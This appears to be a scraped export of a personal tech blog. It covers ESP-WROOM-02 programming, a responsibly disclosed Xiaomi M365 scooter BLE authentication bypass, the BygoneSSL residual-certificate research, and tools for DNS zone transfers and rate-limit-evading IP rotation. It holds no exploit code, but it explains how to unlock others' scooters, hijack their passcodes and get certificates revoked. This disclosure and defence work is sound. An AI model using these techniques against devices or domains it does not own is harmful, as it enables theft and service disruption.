This can also be achieved by reapplying power, so it is not strictly needed for programming but can be nice to have.\nBoot modes If you were to power on the ESP-WROOM-02 as described above and look at the serial output at 74880 8n1 you would see the following message from the boot-loader:\n\\xFF ets Jan 8 2013,rst cause:1, boot mode:(7,0) waiting for host The boot mode shows the current and previous boot mode as mode:(current, previous).\nBoot Mode Table\nBoot Cause Table\nWe only care about booting from UART for programming and from flash for running the program.\nIn order to boot to UART for programming IO0 and IO15 need to be held low (GND) while the ESP boots up. Once in UART programming mode the ESP will switch to 115200 8n1 and wait for a program to be loaded.\nTo boot normally and run your flashed program IO15 needs to be held low (GND) and IO0 can be held high (with a resistor to 3.3v) or left floating.\nAfter the ESP is booted (in either mode) IO0 and IO15 can be repurposed for other GPIO. They only need to be held high/low during boot to set the correct boot mode.\nAfter programming is done, you may need to manually reset the ESP (with RST or reapplying power) and change the configuration to make it boot to the freshly programmed code.\nTo make things as simple as possible, if you don\u0026rsquo;t need to use IO0 and IO15 for your project, IO15 can be permanently wired to GND, and IO0 to a switch to GND to allow for easy programming.\nESP-WROOM-02 breadboard setup with FT232H UART adapter\nPhoto of my ESP-WROOM-02 connected to an Adafruit FT232H UART adapter.\nESPHome I\u0026rsquo;ve decided to use ESPHome as the framework to load code onto the ESP-WROOM-02, but it is also possible to use the much more lightweight Arduino ESP8266 framework as well. ESPHome can be installed inside Docker or with pip.\nBelow is a minimal ESPHome yaml configuration file to get the ESP online and configured to allow flashing further firmware updates over WiFi. 
Be sure to update the placeholder values with your own. You can also enable other sensors or integrations supported by ESPHome.\nesphome: name: esphome-wroom-02 platform: ESP8266 board: esp_wroom_02 wifi: ssid: \u0026#34;YOUR_WIFI_SSID\u0026#34; password: \u0026#34;YOUR_WIFI_PASSWORD\u0026#34; # Enable fallback hotspot (captive portal) in case wifi connection fails ap: ssid: \u0026#34;ESP-WROOM-02\u0026#34; password: \u0026#34;\u0026#34; # fallback mechanism for when connecting to the configured WiFi fails. captive_portal: # enable OTA for firmware flashing over WiFi ota: password: \u0026#34;YOUR_SECURE_PASSWORD_HERE\u0026#34; # Enable logging logger: # enable local web server web_server: port: 80 When you are ready to flash your ESP-WROOM-02 with ESPHome, just pass the yaml configuration file as an argument to the ESPHome command after connecting your UART.\nesphome esp-wroom-02-example.yaml run This will flash the ESP-WROOM-02 with ESPHome with your settings and then start displaying the logs being sent from the ESP over UART. At this point it is now safe to kill the command and disconnect the UART.\nWhenever you power on the ESP-WROOM-02 it will connect to your network and run the configuration you loaded onto it. If you ever want to flash an updated firmware, you can use the http server now running on the ESP to upload a new firmware (be sure to have it set to connect back to the same network) or use the same esphome run command without the UART connected to upload new firmware wirelessly. You can also use esphome logs to view the logs wirelessly without uploading new firmware.\n","permalink":"https://lanrat.com/posts/programming-bare-esp-wroom-02/","summary":"\u003cp\u003eA while ago I received a bunch of bare ESP-WROOM-02 chips on tape, but I could not find enough documentation to program them (partially out of laziness). With my recent interest in \u003ca href=\"https://esphome.io/\"\u003eESPHome\u003c/a\u003e, I decided to give them another try. 
This blog post contains the results of my research on how to program them.\u003c/p\u003e\n\u003cfigure\u003e\n    \u003cimg loading=\"lazy\" src=\"images/esp-wroom-02-chip.webp\"\n         alt=\"ESP-WROOM-02\"/\u003e \u003cfigcaption\u003e\n            \u003cp\u003eESP-WROOM-02\u003c/p\u003e\n        \u003c/figcaption\u003e\n\u003c/figure\u003e\n\n\u003cp\u003eThe ESP-WROOM-02 is just a ESP8266 underneath. If you don\u0026rsquo;t have a breakout board like me, then you will need a UART adapter and make a few minimal solder connections to set the various boot modes to allow you to program the firmware. Once programmed for the first time, you can use OTA updates to allow flashing firmware over WiFi and not need to mess with the wiring every time you want to reprogram it.\u003c/p\u003e","title":"Programming Bare ESP-WROOM-02"},{"content":"Extsort is a Go library that implements external sorting algorithms for datasets larger than available memory. The library manages temporary files and memory buffers to sort data that cannot fit entirely in RAM.\nThe implementation uses merge sort with configurable buffer sizes and temporary file management. It provides a standard Go interface for sorting operations while automatically handling the complexity of disk-based intermediate storage and merging phases.\n","permalink":"https://lanrat.com/projects/extsort/","summary":"\u003cp\u003eExtsort is a Go library that implements external sorting algorithms for datasets larger than available memory. The library manages temporary files and memory buffers to sort data that cannot fit entirely in RAM.\u003c/p\u003e\n\u003cp\u003eThe implementation uses merge sort with configurable buffer sizes and temporary file management. 
It provides a standard Go interface for sorting operations while automatically handling the complexity of disk-based intermediate storage and merging phases.\u003c/p\u003e","title":"Extsort"},{"content":"Allxfr performs DNS zone transfers (AXFR) against nameservers to retrieve complete zone files. The tool systematically attempts zone transfers against root zone servers and other configured nameservers to discover available zone data.\nThe program supports both IPv4 and IPv6 connections and includes options for parallel transfers, dry-run operations, and zone file storage. It implements the DNS AXFR protocol to request complete zone transfers from authoritative nameservers that permit such operations.\n","permalink":"https://lanrat.com/projects/allxfr/","summary":"\u003cp\u003eAllxfr performs DNS zone transfers (AXFR) against nameservers to retrieve complete zone files. The tool systematically attempts zone transfers against root zone servers and other configured nameservers to discover available zone data.\u003c/p\u003e\n\u003cp\u003eThe program supports both IPv4 and IPv6 connections and includes options for parallel transfers, dry-run operations, and zone file storage. It implements the DNS AXFR protocol to request complete zone transfers from authoritative nameservers that permit such operations.\u003c/p\u003e","title":"Allxfr"},{"content":"Minimalin Watch Face is a minimalistic Wear OS watch face featuring clean typography and Material Design aesthetics. 
The watch face displays time with customizable complications and supports ambient mode for always-on displays with reduced power consumption.\nInspired by the original Pebble Minimalin watch face, this Wear OS implementation includes configurable color themes, center complications for additional information display, and optimized rendering for various screen sizes and densities across different smartwatch models.\n","permalink":"https://lanrat.com/projects/minimalin-watch-face/","summary":"\u003cp\u003eMinimalin Watch Face is a minimalistic Wear OS watch face featuring clean typography and Material Design aesthetics. The watch face displays time with customizable complications and supports ambient mode for always-on displays with reduced power consumption.\u003c/p\u003e\n\u003cp\u003eInspired by the original \u003ca href=\"/projects/minimalin-reborn/\"\u003ePebble Minimalin watch face\u003c/a\u003e, this Wear OS implementation includes configurable color themes, center complications for additional information display, and optimized rendering for various screen sizes and densities across different smartwatch models.\u003c/p\u003e","title":"Minimalin Watch Face"},{"content":"Sometime in the first half of 2018 there was an explosion of \u0026ldquo;Dockless e-scooters\u0026rdquo; appearing all over the Bay Area. These devices are electric scooters that anyone can rent for a one-way trip and find/leave them (at the time) anywhere you want. As one could guess, this led to lots of issues, but they were convenient and I wanted one of my own, so I did a little research into how to acquire one for private use.\nXiaomi M365\nIt turns out that two of the three big players at the time, Bird and Spin, both used off-the-shelf consumer electric scooters made by Xiaomi, often sold as the M365. While these scooters were sold by Xiaomi, it appears that they were actually designed and built by Segway-Ninebot, who sold the design to Xiaomi.
Knowing this, it was easy to find them for sale online.\nWe live in a world where there is \u0026ldquo;an app for that\u0026rdquo; for everything, and this scooter is no exception. While the scooter can be used without an app, it will have limited functionality and you will not be able to change any of the settings or enable any of the \u0026ldquo;security\u0026rdquo; features or \u0026ldquo;lock\u0026rdquo; the scooter.\nWhen \u0026ldquo;locked\u0026rdquo; the scooter will use the motor to add resistance to the front wheel, making it difficult or impossible to turn, and sound its alarm beep. This won\u0026rsquo;t stop all theft but it is a good deterrent. Additionally, you can set a numeric pass-code on the scooter that you will need to enter in the app for the scooter to turn on.\nThe App The Xiaomi-provided App was an all-in-one solution for every IoT thing they offer. I guess if you are deep into the Xiaomi ecosystem this makes sense, but for the simple scooter control I wanted, this was overkill. Additionally, the permissions the app requested made the privacy enthusiast in me cry out in terror. It wants access to almost everything Android offers, which is way overkill for a scooter control application, and likely still overkill for every other IoT device they produce. Not to mention, while Xiaomi does make some nice things, they are based out of China, which is where they produce their hardware and software, which may be cause for concern.\nI thought that if I could reverse-engineer the scooter portion of the Xiaomi App and put it into my own app it would solve these problems. Unfortunately the Xiaomi App was heavily obfuscated and the scooter code was a very small portion of the larger app, which was all jumbled together. While I\u0026rsquo;m sure it would have been possible to do this, I set out to find an easier solution.\nBefore Xiaomi bought the scooter designs from Ninebot they had their own app to control their scooters.
This is a much smaller app that was mostly just the code for the scooters. Unfortunately, since Xiaomi took over the M365, NineBot has updated their app to no longer work with the Xiaomi scooters. (WHY???) Alas, version 4.3.0 and below still work with the Xiaomi M365 and can be found online and side-loaded manually.\nHowever, while Ninebot\u0026rsquo;s app required far fewer permissions than Xiaomi\u0026rsquo;s app, it still required more permissions than I was comfortable with. So I continued my journey to reverse-engineer the simpler NineBot app to implement my own solution.\nReverse Engineering Pre-existing work Luckily for me there was already a community built around modding the M365 scooters who had already started reverse-engineering some of the functionality. Most of the prior work was focused on modding the firmware of the M365 itself to change built-in functionality, like removing the speed governor and increasing the rate of acceleration. If you are interested in that, you can generate custom firmware images at M365 Botox and find an app to flash them on Google Play.\nIf you do try to create a custom firmware image for the scooter and flash it, you will notice that the firmware flasher application sends the firmware over Bluetooth Low-Energy (BLE). And it can replace the firmware on a device that is \u0026ldquo;locked\u0026rdquo;\u0026hellip; Uh oh!\nBluetooth Low Energy The BLE packet format has already been well-documented in the prior work, and salvamr created the wonderful m365-ble-msg-builder Java API that simplifies the work required to send/receive BLE packets in a format that the Scooter wants.
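As a rough sketch of what that community documentation describes, a frame can be assembled like this; I am assuming the commonly documented layout (a 0x55 0xAA header, then a length byte, address, command, and argument bytes plus payload, followed by a 16-bit little-endian checksum that is the bitwise NOT of the sum of everything after the header), and the byte values in the example are placeholders, not real scooter opcodes:

```python
def build_frame(addr, cmd, arg, payload=b""):
    # Body: length byte (payload length + 2), address, command, argument, payload.
    body = bytes([len(payload) + 2, addr, cmd, arg]) + payload
    # Checksum: bitwise NOT of the byte sum, sent little-endian.
    checksum = (~sum(body)) & 0xFFFF
    return b"\x55\xAA" + body + checksum.to_bytes(2, "little")

# Placeholder values for illustration only:
frame = build_frame(addr=0x20, cmd=0x01, arg=0x02, payload=b"\x03")
print(frame.hex())
```

The checksum construction means a receiver can validate a frame by summing the body and checksum together and checking for 0xFFFF, which is the property the builder libraries rely on.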
Additionally maisi\u0026rsquo;s M365-Power App to display log data from the Scooter made a good place to start.\nAll I needed was to find the BLE packets for the commands I wanted to implement from the NineBot application and make my own app to send them and parse any responses.\nIt should also be noted that the normal Bluetooth pairing process does involve a sort of mutual authentication between devices that helps add a layer of security on top of the Bluetooth channel, making it harder for any Bluetooth device to start talking to any other device. However, Bluetooth Low Energy lacks built-in authentication, relying on the application layer to handle the authentication (if any).\nNineBot App After spending some time digging through the decompiled output of the NineBot app I obtained a fairly good understanding of how the auth works. To summarize, it goes something like this:\nApp pairs with Scooter using BLE UART App asks Scooter for saved passcode Scooter provides App the saved passcode App asks user for passcode App compares the two passcodes If the passcodes match, App sends \u0026ldquo;unlock\u0026rdquo; packet to scooter If the passcodes do not match, App shows error to user. It does not take a security mastermind to figure out the obvious problem here. The authentication is performed \u0026ldquo;client-side\u0026rdquo;.
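The flow above can be simulated in a few lines of Python to show why it fails; every class and function name here is invented for illustration:

```python
class MockScooter:
    """Stand-in for the scooter's BLE interface."""
    def __init__(self, passcode):
        self._passcode = passcode
        self.locked = True

    def get_saved_passcode(self):
        # The scooter hands its secret to whoever asks.
        return self._passcode

    def handle_unlock_packet(self):
        # The scooter performs no check of its own before unlocking.
        self.locked = False

def honest_app_unlock(scooter, user_entry):
    # The comparison happens on the phone, not on the scooter.
    if user_entry == scooter.get_saved_passcode():
        scooter.handle_unlock_packet()

def attacker_unlock(scooter):
    # An attacker simply skips the comparison and sends "unlock" directly.
    scooter.handle_unlock_packet()
```

Because nothing on the scooter side enforces the check, attacker_unlock() succeeds without ever learning the passcode.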
Which means that the device a user controls (their phone running the app) is in charge of deciding for itself if it should be allowed in.\nAn example of client side auth in the real world\nM365 Goals At this point I had become interested in the BLE packets for the following sensitive actions:\nUnlock the scooter Lock the scooter Read the saved password from the Scooter Save a new password to the Scooter I was able to find the packets for retrieving and setting the passcode fairly easily, and with some help from my friend Brandon Weeks I found the lock and unlock packets as well and implemented them in a simple test application.\nM365-Toolbox Using the M365-Power app as a base, I created M365-ToolBox to test sending the interesting packets. Surprisingly everything just worked. When sending any of the packets, such as unlock, the scooter would happily respond with a \u0026ldquo;chirp\u0026rdquo; and unlock itself without any fuss. Every command I tested worked pre-authentication. So not only was the authentication handled client-side; the scooter didn\u0026rsquo;t even care if you skipped the authentication step and just told it what you wanted it to do. I tested on a few other scooters and they all worked the same. I could remotely unlock/lock any scooter without knowing its password; additionally, I could read the passwords other users had set and even change them, resulting in a Denial of Service.\nM365 Toolbox Screenshot\nIf I wanted to use any of the more advanced features, I could use the NineBot or Xiaomi apps with the scooter and provide them the password that my app had read from the scooter.\nDisclosure After finding these issues I disclosed them to all the affected parties I could before making this post, waiting to give them plenty of time to fix the issues.
I submitted my findings and a copy of my M365-Toolbox app and was eventually rewarded $500 for my finding.\nTimeline December 23rd 2018: Initial disclosure to security@xiaomi.com December 24th 2018: Xiaomi acknowledges and requests POC December 25th 2018: I share POC code and detailed explanation December 29th 2018: Xiaomi confirms they are able to reproduce the vulnerability January 1st 2019: Xiaomi rewards me 4000 RMB (~$500) from their Bug Bounty Spin Spin, which used the same hardware, was also vulnerable to the same packets that could take over their scooters. I had great difficulty finding contact information for anyone to disclose this to. I eventually found the emails for their support and a few of their engineers, and decided to email them all and hope for the best. Unfortunately they were not very responsive and ultimately I was never able to disclose to them. As far as I know they are still vulnerable.\nTimeline January 11th 2019: Initially reached out to Spin to disclose vulnerability January 21st 2019: After no contact, I follow up with some more details and increase the sense of urgency January 21st 2019: I\u0026rsquo;m told the policy team will reach out to me after reviewing my \u0026ldquo;case\u0026rdquo; Radio silence Bird Bird also uses the Xiaomi M365 hardware, but they replace the BLE controller board with what people are calling a Bird Brain. The Bird Brain has a cellular modem and relays all commands through Bird\u0026rsquo;s servers to the user\u0026rsquo;s phone. As a result of this, they are not vulnerable to the attack I describe here, so I did not find it necessary to disclose to them.
However a quick glance at their app\u0026rsquo;s decompiled code shows some Bluetooth functionality, so this might be a good area to explore further.\nOther Related Security Findings In the process of performing my background research on this I ran across this report from IOActive finding a very similar vulnerability in NineBot\u0026rsquo;s Segway product about a year earlier. Since IOActive found and disclosed this, NineBot has patched it, which is great! However, it is saddening to see that after the disclosure NineBot failed to learn from their mistake and included a very similar vulnerability in other products.\nAfter I reported my findings to Xiaomi, Rani Idan found the same vulnerabilities that I did and also reported them to Xiaomi. Xiaomi told them that they already knew of the issue (likely in part due to my report) so Rani decided to release their POC. Even after they released their POC I still felt it was right to wait at least 90 days from my disclosure before releasing mine.\n","permalink":"https://lanrat.com/posts/xiaomi-m365/","summary":"\u003cp\u003eSometime in the first half of 2018 there was an explosion of \u0026ldquo;Dockless e-scooters\u0026rdquo; \u003ca href=\"https://techcrunch.com/story/the-electric-scooter-saga-in-san-francisco/\"\u003eappearing all over the Bay Area\u003c/a\u003e. These devices are electric scooters that anyone can rent for a one-way trip and find/leave them (at the time) anywhere you want. As one could guess this \u003ca href=\"https://www.businessinsider.com/san-francisco-ban-shared-dockless-scooters-2018-5\"\u003eled to lots of issues\u003c/a\u003e but they were convenient and I wanted one of my own so I did a little research into how to acquire one for private use.\u003c/p\u003e","title":"Xiaomi M365 Scooter Authentication Bypass"},{"content":"M365 Toolbox demonstrates a security vulnerability in the Xiaomi M365 electric scooter\u0026rsquo;s communication protocol.
The Java application exploits weaknesses in the scooter\u0026rsquo;s Bluetooth Low Energy (BLE) authentication mechanism to bypass security controls and execute unauthorized commands.\nThe proof-of-concept tool reveals how the scooter\u0026rsquo;s authentication can be circumvented through protocol manipulation, allowing remote control access without proper authorization. This research highlighted critical security flaws in IoT device communication protocols commonly found in consumer transportation devices.\n","permalink":"https://lanrat.com/projects/m365-toolbox/","summary":"\u003cp\u003eM365 Toolbox demonstrates a security vulnerability in the Xiaomi M365 electric scooter\u0026rsquo;s communication protocol. The Java application exploits weaknesses in the scooter\u0026rsquo;s Bluetooth Low Energy (BLE) authentication mechanism to bypass security controls and execute unauthorized commands.\u003c/p\u003e\n\u003cp\u003eThe proof-of-concept tool reveals how the scooter\u0026rsquo;s authentication can be circumvented through protocol manipulation, allowing remote control access without proper authorization. This research highlighted critical security flaws in IoT device communication protocols commonly found in consumer transportation devices.\u003c/p\u003e","title":"M365 Toolbox"},{"content":"A Go library and SOCKS5 proxy server that enables egress traffic from multiple IP addresses within a subnet. Stargate randomly distributes network connections across different IP addresses to avoid rate-limiting and provide load balancing across available IP ranges.\nThe tool works best with subnets directly routed to the host and is particularly powerful for IPv6 subnet utilization. It supports both TCP CONNECT and UDP ASSOCIATE protocols and provides both a standalone proxy tool and a Go library for programmatic random IP networking. 
Requires specific network routing configuration and primarily supports Linux and FreeBSD platforms due to freebind networking capabilities.\n","permalink":"https://lanrat.com/projects/stargate/","summary":"\u003cp\u003eA Go library and SOCKS5 proxy server that enables egress traffic from multiple IP addresses within a subnet. Stargate randomly distributes network connections across different IP addresses to avoid rate-limiting and provide load balancing across available IP ranges.\u003c/p\u003e\n\u003cp\u003eThe tool works best with subnets directly routed to the host and is particularly powerful for IPv6 subnet utilization. It supports both TCP CONNECT and UDP ASSOCIATE protocols and provides both a standalone proxy tool and a Go library for programmatic random IP networking. Requires specific network routing configuration and primarily supports Linux and FreeBSD platforms due to freebind networking capabilities.\u003c/p\u003e","title":"Stargate"},{"content":"Binary Analog Watch Face is an Android Wear watch face that combines analog time display with binary representation. The watch face uses binary digits to form the hour and minute hands, creating a unique visualization where time is displayed both analogically and in binary format.\nThe watch face features Material Design aesthetics with customizable color themes and optional center complications. The implementation renders traditional analog clock hands using sequences of binary digits, inspired by Anthony Liekens\u0026rsquo;s Analog Binary Wall Clock concept.\n","permalink":"https://lanrat.com/projects/binary-analog-watch-face/","summary":"\u003cp\u003eBinary Analog Watch Face is an Android Wear watch face that combines analog time display with binary representation. 
The watch face uses binary digits to form the hour and minute hands, creating a unique visualization where time is displayed both analogically and in binary format.\u003c/p\u003e\n\u003cp\u003eThe watch face features Material Design aesthetics with customizable color themes and optional center complications. The implementation renders traditional analog clock hands using sequences of binary digits, inspired by Anthony Liekens\u0026rsquo;s Analog Binary Wall Clock concept.\u003c/p\u003e","title":"Binary Analog Watch Face"},{"content":"This is the blog version of my DEFCON 26 talk Lost and Found Certificates: dealing with residual certificates for pre-owned domains, which I co-presented with Dylan Ayrey.\nYou can learn more about BygoneSSL and see a demo at insecure.design.\nThe Problem A certificate can outlive the ownership of a domain.\nIf the domain is then re-registered by someone else, this leaves the first owner with a valid SSL certificate for the domain now owned by someone else.\nThe above diagram illustrates an example where Alice registers foo.com for 1 year, and gets a 3-year SSL certificate from a trusted Certificate Authority. Alice then decides not to renew the domain (or possibly forgets) and after one year the domain expires. Some time later, Bob registers foo.com, and because Bob is on top of all the latest security trends, he also gets an SSL certificate to protect the traffic to his new domain. Little does he know that Alice, malicious or not, still has a valid SSL certificate for what is now Bob\u0026rsquo;s domain. This is a problem we are calling BygoneSSL.\nWhat can Bob do?\nUntil recently it was not even possible for Bob to determine whether prior certificates exist for his domain. However, now we have Certificate Transparency.\nCertificate Transparency Certificate Transparency (CT) was designed to catch bad or misbehaving Certificate Authorities (CAs). 
Anyone can run a CT Log server, which is a publicly auditable log of certificates that anyone can submit to. At the time of writing there are about 1/2 billion certificates in public CT logs and growing.\nCT is required for all certificates issued after April 2018 to be trusted. Many certificates issued before April are also in the logs, but it is not required.\nFor more information on Certificate Transparency, see my CertGraph post or the Certificate Transparency site.\nFinding Pre-existing Certificates Knowing the registration date of a domain, you can search CT logs for certificates issued before the registration date, and valid after. However, there is no guarantee that all certificates issued before April 2018 will be found. So you may not have a complete picture, but it is as close as we can get.\nAn Example: stripe.com stripe.com is an excellent example of this. Stripe is a major online payment processor. They acquired their domain name in 2010 from a domain parking service. However, there exists a certificate issued in 2009 that is valid until 2011, over a year into Stripe\u0026rsquo;s ownership of stripe.com.\nWhy is this a problem? Well, aside from the fact that the previous domain owner could Man-in-the-Middle the new domain owner\u0026rsquo;s SSL traffic for that domain, if there are any domains that share alt-names with the domain, they can be revoked, potentially causing a Denial-of-Service if they are still in use. 
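The search described under Finding Pre-existing Certificates boils down to a date-window filter. As a minimal, hypothetical sketch (the `bygone_certs` helper is mine, not from the original tooling), assuming certificate validity dates have already been fetched from a CT search engine such as crt.sh:

```python
from datetime import date

def bygone_certs(certs, registered):
    """Return certificates issued before the domain's current
    registration date but still valid after it (potential BygoneSSL)."""
    return [c for c in certs
            if c["not_before"] < registered < c["not_after"]]

# Sample data shaped like parsed CT search results (dates as date objects)
certs = [
    {"id": 1, "not_before": date(2009, 8, 1), "not_after": date(2011, 8, 1)},
    {"id": 2, "not_before": date(2018, 1, 1), "not_after": date(2020, 1, 1)},
]
# A domain registered mid-2010 is shadowed by cert 1, as in the stripe.com case
print([c["id"] for c in bygone_certs(certs, date(2010, 6, 1))])  # → [1]
```

The same filter applied across a certificate's alt-names identifies the shared-certificate cases discussed next.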
More on this below.\nBygoneSSL Definition noun An SSL certificate created before its domain\u0026rsquo;s current registration date and still valid after it.\nBygoneSSL Man in the Middle If a company acquires a previously owned domain, the previous owner could still have a valid certificate, which could allow them to MitM the SSL connection with their prior certificate.\nThe stripe.com case above is an example of a potential BygoneSSL Man in the Middle.\nBygoneSSL Denial of Service If a certificate has a subject alt-name for a domain no longer owned by the certificate user, it is possible to revoke the certificate that has both the vulnerable alt-name and other domains. You can DoS the service if the shared certificate is still in use!\nRevoking The CA/Browser Forum, which sets the rules by which Certificate Authorities and Browsers should operate, states that if any information in a certificate becomes incorrect or inaccurate, it should be revoked. Additionally, if the domain registrant has failed to renew their domain, the CA should revoke the certificate within 24 hours.\nDoS example: do.com do.com has had many owners in the past few years, some of which added the domain to their SSL certificates. However, in this particular case, the certificate hosting salesforce.com listed do.com as an alt-name, even after do.com was transferred to another owner.\nDue to the regulations set by the CA/B forum, this certificate could be revoked, causing downtime for the users of salesforce.com.\nThe above screenshot is of CertGraph, a tool I wrote to identify related domains through linked certificate alt-names, showing how salesforce.com is linked to squarespace.com through the do.com alt-name in the certificate past Salesforce\u0026rsquo;s ownership of the domain.\nHow big is this issue? In order to get an idea of how many BygoneSSL certificates might still be out there, we performed an analysis on over 3 million random domains and their 7.7 million SSL certificates. 
This sample makes up about 1% of the Internet\u0026rsquo;s domains.\nTo determine if a domain has been transferred, we searched historical WHOIS, Name Servers, and the WayBack Machine. Since there are many reasons a domain\u0026rsquo;s WHOIS, Name Servers, or site may change, we intentionally weighted the algorithm to favor false negatives over false positives. It is not perfect: there are MANY false negatives and quite a few false positives, but it does give a glimpse into the scale of the problem.\nDomains Directly Affected (MitM) A domain is directly affected if there exists a certificate that was created before its registration date, and valid after. In the random sampling of domains studied, we found that 0.45% meet this criterion. This might seem like a small number, but the Internet is huge, which puts this at around 1.5 million domains. Of the certificates sampled that are affected, 25% are still valid and can be used today by the prior domain owner.\nDomains Affected by Alt-Names (DoS) A domain is affected by an alt-name if it shared a certificate with a domain that is directly affected. These domains can be subjected to a Denial of Service, as in the do.com example above. Of the domains studied, 2.05% are affected by sharing a certificate with an alt-name. This represents about 7 million domains on the entire Internet, a 4x increase over the previous MitM finding. Of the certificates affected, 41% are still valid, meaning they can be revoked and, if still in use, will cause breakage!\nWhat should be done about this? If you find a certificate that is still in use that has an alt-name that is no longer under the control of the certificate owner, you should notify them. Bonus points if they have a bug bounty and you mention BygoneSSL. If not, how much notice should you give? 
The CAs should revoke within 24 hours of being notified; however, many of them take weeks, so it is best to give as much notice as possible to avoid being disruptive.\nProtecting your own Domains First, search CT for BygoneSSL certificates for your domains. If you find any, reach out to the issuing CAs and request that they be revoked. If the certificates have alt-names that are still in use, you should give the other domain owners a heads-up as well in case they are still using the certificates.\nNext, you should set up your servers to use the Expect-CT header in enforce mode to prevent any SSL certificates that are not in CT from being valid for your domains. Unfortunately, this will only work for visitors whose first connection to your site is not intercepted. You also need to continue monitoring CT logs in case an older cert gets added later. Certificates can be added to CT logs at any time, not just when they are issued. Be sure to check for alt-names as well. You don\u0026rsquo;t want someone sitting on a certificate to start using it once they submit it years later. We\u0026rsquo;ve written a few tools to help you do this, mentioned in the next section.\nFixing the problem for the Internet It would be great if CAs did not issue certificates valid for longer than the current domain\u0026rsquo;s registration. If you could not get an SSL certificate valid for longer than your domain registration, this problem would be drastically reduced, excluding transfers, where the new domain owner should expect that the prior owner may have a pre-existing certificate.\nCAs should only issue short-lived certificates. We are making progress on this. New 10- and 5-year certificates are no longer allowed. The current maximum life for a certificate is 825 days, which is just over 2 years. 
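As a rough illustration of that limit (a hypothetical check, not part of the original post), flagging certificates whose validity window exceeds the 825-day maximum is a one-line date calculation:

```python
from datetime import date

# Maximum certificate lifetime under the CA/B Forum rules described above
MAX_LIFETIME_DAYS = 825

def exceeds_max_lifetime(not_before, not_after):
    """True if a certificate's validity window is longer than allowed."""
    return (not_after - not_before).days > MAX_LIFETIME_DAYS

# A 3-year certificate, like Alice's in the foo.com example, would be flagged
print(exceeds_max_lifetime(date(2015, 1, 1), date(2018, 1, 1)))  # → True
print(exceeds_max_lifetime(date(2017, 1, 1), date(2018, 1, 1)))  # → False
```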
There is ongoing work to reduce this even further, with Let\u0026rsquo;s Encrypt leading the way with 90-day certificates!\nDomain registrars could show you pre-existing valid certificates logged in CT when registering or transferring a domain. This gives the domain owner visibility into the potential BygoneSSL certificates that may exist before they could do any damage.\nTools CertGraph CertGraph can also be used to detect BygoneSSL MitM and DoS. For MitM, use certgraph normally and look for cases where your graph of domains reached domains or certificates that you do not control.\nFor DoS, use certgraph with the following options:\ncertgraph -depth 1 -driver google -ct-subdomains -cdn [DOMAIN]... A future version of CertGraph will include a -bygonessl flag to automate this and add more features, such as domain availability checks.\nCertSpotter CertSpotter is a free and open source Certificate Transparency Log Monitor by SSLMate. I\u0026rsquo;ve added support for detecting BygoneSSL certificates and got it merged upstream. It works the same, but you can add a valid_at date to the watch-list.\nFor example, the following watch-list would find the BygoneSSL certificate for insecure.design registered on April 18th, 2018:\ninsecure.design valid_at:2018-04-18 defcon.org valid_at:1993-06-21 wikipedia.org valid_at:2001-01-13 toorcon.net valid_at:2012-03-13 Since this is a full Certificate Transparency Log Monitor, it will take some time to go through the backlog of certificates on the remote logs on its first run.\nBygoneSSL Facebook Search Tool Dylan also wrote a similar tool to search Facebook\u0026rsquo;s Certificate Transparency Monitor. It requires Facebook OAuth, but is much faster because it does not need to inspect an entire log. 
You can find it here: https://github.com/dxa4481/bygonessl.\nDefcon Recording CA \u0026amp; Browser Forum Presentation ","permalink":"https://lanrat.com/posts/bygonessl/","summary":"\u003cp\u003eThis is the blog version of my DEFCON 26 talk \u003ca href=\"https://www.defcon.org/html/defcon-26/dc-26-speakers.html#Foster\"\u003eLost and Found Certificates: dealing with residual certificates for pre-owned domains\u003c/a\u003e, which I co-presented with \u003ca href=\"https://security.love\"\u003eDylan Ayrey\u003c/a\u003e.\u003c/p\u003e\n\u003cp\u003eYou can learn more about BygoneSSL and see a demo at \u003ca href=\"https://insecure.design\"\u003einsecure.design\u003c/a\u003e.\u003c/p\u003e\n\u003ch2 id=\"the-problem\"\u003eThe Problem\u003c/h2\u003e\n\u003cp\u003eA Certificate can outlive the ownership of a domain.\u003c/p\u003e\n\u003cp\u003eIf the domain is then re-registered by someone else, this leaves the first owner with a valid SSL certificate for the domain now owned by someone else.\u003c/p\u003e","title":"BygoneSSL - dealing with residual certificates for pre-owned domains"},{"content":"CZDS is a Go library and CLI tool for interacting with ICANN\u0026rsquo;s Centralized Zone Data Service API. It handles authentication, zone file downloads, request submissions, and status monitoring for accessing top-level domain zone data.\nThe implementation supports parallel downloads, request management, and provides both library interfaces for Go applications and standalone command-line functionality. The tool automates the process of requesting and retrieving DNS zone files from ICANN\u0026rsquo;s centralized service.\n","permalink":"https://lanrat.com/projects/czds/","summary":"\u003cp\u003eCZDS is a Go library and CLI tool for interacting with ICANN\u0026rsquo;s Centralized Zone Data Service API. 
It handles authentication, zone file downloads, request submissions, and status monitoring for accessing top-level domain zone data.\u003c/p\u003e\n\u003cp\u003eThe implementation supports parallel downloads, request management, and provides both library interfaces for Go applications and standalone command-line functionality. The tool automates the process of requesting and retrieving DNS zone files from ICANN\u0026rsquo;s centralized service.\u003c/p\u003e","title":"CZDS"},{"content":"Certgraph is a tool I\u0026rsquo;ve been developing to scan and graph the network of SSL certificate alternative names. It can be used to find other domains that belong to an organization that may be several degrees removed and not always obvious.\nBackground The idea for this project came about after examining the SSL certificate for XKCD.com. If you look closely at the screenshot below you will see that the SSL certificate used on XKCD.com is also valid for many domains which have no relationship to XKCD or Randall Munroe.\nThis behavior is a side-effect of the CDN used by XKCD, in this case, Fastly. Fastly is putting many of their clients on the same certificate, likely in an effort to simplify their deployment. This works because SSL certificates can use the \u0026ldquo;Certificate Subject Alternative Name\u0026rdquo; extension to add a list of additional hosts that the certificate should be valid for in addition to the primary name specified in the certificate.\nThere can also be many certificates issued for a single domain. This creates a many-to-many relationship between certificates and domains; an ideal target to graph.\nCertificate Transparency Certificate Transparency logs provide an additional and excellent source of SSL certificates to query. 
